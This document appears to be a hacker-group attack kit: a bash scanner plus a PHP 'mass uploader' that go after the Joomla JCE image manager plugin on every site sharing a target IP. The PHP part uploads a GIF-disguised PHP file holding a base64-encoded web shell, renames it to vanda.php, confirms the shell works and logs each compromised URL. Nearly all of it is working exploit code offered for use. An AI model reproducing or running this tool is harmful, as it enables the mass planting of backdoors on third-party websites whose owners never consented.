========================================
.sh
========================================
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#
#-------------------- Red V!per Banner ----------------------------------------------------------------------------
Banner()
{
clear
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" || || "; tput sgr0
echo -e '\E[34m'" ||\E[31m _____ _ __ ___ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | __ \ | | \ \ / / | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___ __| | \ \ / /| |_ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | _ // _ \/ _\ | \ \/ / | | '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \ __/ (_| | \ / |_| |_) | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \_\___|\__,_| \/ (_) .__/ \___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m (_) \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ ___ ___ ___ ___ __ _ _ __ _ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | | (_| __/ \__ \ (_| (_| | | | | | | | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e " Server Jce Scanner && Exploiter"
echo
echo -e " BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [ INFO ] ===========-"
echo
read -p "[*] Target Ip : " IP
echo -e "$N"
}
#-------------------- Variables ----------------------------------------------------------------------------
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"
#-------------------- Scanning Jce Targets on Server -------------------------------------------------------
scan_jce_on_victim()
{
page=0
how_many=1
single_page=
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"
wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `
cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php
let page=$page+1
done
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
for domain in `cat domains.txt`
do
GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
if [ $check -eq 0 ]
then
echo "www.$domain" > site.lst
php jce.php site.lst shells.lst
GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
if [ $check2 -eq 0 ]
then
echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
else
echo "[-] www.$domain/ [No] "
fi
else
echo "[-] www.$domain/ [No] "
fi
done
rm -rf alldomain_bing.txt
rm -rf domains.txt
rm -rf site.lst
rm -rf shells.lst
}
#-------------------- Remove ------------------------------------------------------------------------
all_remove()
{
rm -rf alldomain_bing*
rm -rf domains_f*
rm -rf domains_f*
rm -rf domain_bing*
rm -rf alldomain_bing*
rm -rf domains*
rm -rf jce_server*
rm -rf site*
}
#-------------------- Main Brain :D ------------------------------------------------------------------------
main()
{
chmod +x jce.php
if [ ! -f shells.lst ]; then
touch shells.lst ;
fi
Banner;
all_remove;
scan_jce_on_victim;
}
main;
========================================
.php
========================================
<?php
/*
# Mass Uploader
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/
$kirilmis = 0;
$taranmis = 0;
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 3);
function oku($link)
{
$site = parse_url($link);
$link = $site["path"];
$site = $site["host"];
$httpresponse = "";
$fp = fsockopen($site, 80, $err_num, $err_msg, 30);
if ($fp) {
fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");
fputs($fp, "Connection: close\n\n");
while (!feof($fp)) {
$http_response .= fgets($fp, 128);
}
fclose($fp);
}
return $http_response;
}
$dosya = $argv[1];
$kirilanlar = fopen($argv[2], 'w');
$okunan = file($dosya);
$toplam = count($okunan);
foreach ($okunan as $sira => $satir) {
$hatalisite = 0;
$satir = preg_replace("/[\\n\\r]+/", "", $satir);
$url = parse_url($satir);
if ($url["scheme"])
$host = $url["host"];
else {
$url = parse_url("http://" . $satir);
$host = $url["host"];
}
$packet = "Mua-Kontrol-Paketi-Panpa";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$content = "GIF89a1\n";
$content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';
$data = "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";
$data .= "Content-Type: image/gif\r\n\r\n";
$data .= "$content\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "0day\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$data .= "upload\r\n";
$data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
$packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";
$packet .= $data;
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: Mua \r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
$packet .= "Accept-Encoding: deflate\n";
$packet .= "X-Request: JSON\r\n";
$packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
$ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";
$packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";
$packet .= $ren . "\r\n\r\n";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$taranmis = $taranmis + 1;
$kod = oku("http://" . $host . "/images/stories/vanda.php");
$pozisyon = strpos($kod, "GIF89a1");
if ($pozisyon == true) {
$kirilmis = $kirilmis + 1;
fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");
}
} //for each
fclose($yaz);
fclose($kirilanlar);